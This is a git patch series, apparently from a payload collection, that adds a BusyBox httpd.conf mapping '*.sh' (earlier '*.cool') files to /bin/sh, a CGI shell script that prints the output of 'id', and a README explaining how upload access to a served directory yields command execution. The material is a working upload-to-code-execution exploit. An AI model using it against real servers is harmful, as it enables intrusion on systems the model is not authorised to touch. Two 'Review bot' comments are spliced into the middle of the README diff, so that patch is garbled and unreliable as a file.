From 1e4e04831b0e0a458dbec42cc2fe22824c71d7fd Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Thu, 13 Dec 2018 23:56:10 +0000
Subject: [PATCH 1/4] Create httpd.conf
---
Upload insecure files/Busybox httpd.conf/httpd.conf | 1 +
1 file changed, 1 insertion(+)
create mode 100644 Upload insecure files/Busybox httpd.conf/httpd.conf
diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Busybox httpd.conf/httpd.conf
new file mode 100644
index 0000000..652c80e
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/httpd.conf
@@ -0,0 +1 @@
+*.cool:/bin/sh
From f1fec1c9524da6c87075bc83a0422e691f6fef1f Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Thu, 13 Dec 2018 23:58:24 +0000
Subject: [PATCH 2/4] Create shellymcshellface.sh
---
Upload insecure files/Busybox httpd.conf/shellymcshellface.sh | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
diff --git a/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
new file mode 100644
index 0000000..0282e4b
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
@@ -0,0 +1,3 @@
+echo "Content-type: text/html"
+echo ""
+echo `id`
From 1d6b34ace59266fab7d7d2946ea1c918e03babd6 Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Fri, 14 Dec 2018 00:02:58 +0000
Subject: [PATCH 3/4] Create README.md
---
Upload insecure files/Busybox httpd.conf/README.md | 11 +++++++++++
1 file changed, 11 insertions(+)
create mode 100644 Upload insecure files/Busybox httpd.conf/README.md
diff --git a/Upload insecure files/Busybox httpd.conf/README.md b/Upload insecure files/Busybox httpd.conf/README.md
new file mode 100644
index 0000000..67f71a6
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/README.md
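Review bot: The added line `*.cool:/bin/sh` in httpd.conf (patch 1/4) carries no comment saying what the mapping does or which server reads it, and the same applies to the `*.sh:/bin/sh` line in patch 4/4. The README in this series quotes a trailing `#` comment from httpd.c, so a form such as `*.cool:/bin/sh # example: every *.cool file in this directory is run through /bin/sh` should be accepted, though that is worth confirming against the BusyBox build in use. For readers auditing a server, the file would also benefit from stating the precondition the README describes: a writable directory that httpd serves and scans for a per-directory config.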
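Review bot: The last added line of shellymcshellface.sh (patch 2/4), ``echo `id` ``, pushes the command output through backticks and an unquoted echo, which only word-splits it again; a bare `id` prints the same line. The header declares `Content-type: text/html` while the body is plain text, so `echo "Content-type: text/plain"` would describe the response accurately. The script has no header comment; a single `#` line stating that it only prints the identity of the server process as an execution marker would make its scope clear to readers.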
@@ -0,0 +1,11 @@
+If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter.
+
+Details from Busybox httpd.c
+
+https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60
+
+> *.php:/path/php # run xxx.php through an interpreter`
+
+> If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration.
+
+Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :)
From 20c6bb22998b4903bc1b6783f60c91ced207215f Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Fri, 14 Dec 2018 00:03:50 +0000
Subject: [PATCH 4/4] Update httpd.conf
---
Upload insecure files/Busybox httpd.conf/httpd.conf | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Busybox httpd.conf/httpd.conf
index 652c80e..da4bd65 100644
--- a/Upload insecure files/Busybox httpd.conf/httpd.conf
+++ b/Upload insecure files/Busybox httpd.conf/httpd.conf
@@ -1 +1 @@
-*.cool:/bin/sh
+*.sh:/bin/sh